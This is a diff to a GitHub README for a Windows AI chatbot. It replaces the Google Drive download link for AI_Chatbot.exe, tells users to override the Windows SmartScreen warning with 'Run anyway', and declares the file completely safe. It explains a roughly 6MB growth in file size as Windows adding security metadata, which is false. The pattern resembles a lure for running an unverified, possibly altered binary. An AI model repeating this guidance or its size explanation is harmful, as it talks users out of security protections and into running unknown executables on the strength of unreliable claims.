affan4321/AI-Chatbot-using-together.ai-API-with-llama3.3-70b-instruct-turbo-free/README.md

 ### Download and Run

-1. Download the `AI_Chatbot.exe` file from this link: https://drive.google.com/file/d/1UgJJRJsZ_HzrPlFnwIYM2ozTj2DA5Vbm/view?usp=sharing
+1. Download the `AI_Chatbot.exe` file: https://drive.google.com/file/d/17pBdun8hBG6gCEo1PZuhy4vOXx9Hmz2R/view?usp=sharing
+2. **Windows Security Warning**: You may see "Windows protected your PC" warning
+   - This is **normal** for unsigned executables
+   - Click "More info" → "Run anyway" to proceed
+   - All independent developers face this without expensive certificates ($300-800/year)
-2. Double-click to run
+3. Double-click to run
-3. Start chatting with the AI!
+4. Start chatting with the AI!
-4. Type `exit` to quit
+5. Type `exit` to quit

+### Common Questions

+**Q: Why does Windows show a security warning?**
+A: This happens because the executable isn't digitally signed.
+It's completely safe - this affects all unsigned software from independent developers.

+**Q: Why does the file size appear larger after download?**
+A: Windows adds security metadata during download (~111MB becomes ~117MB).
+This is normal Windows behavior and doesn't affect functionality.

 ### Usage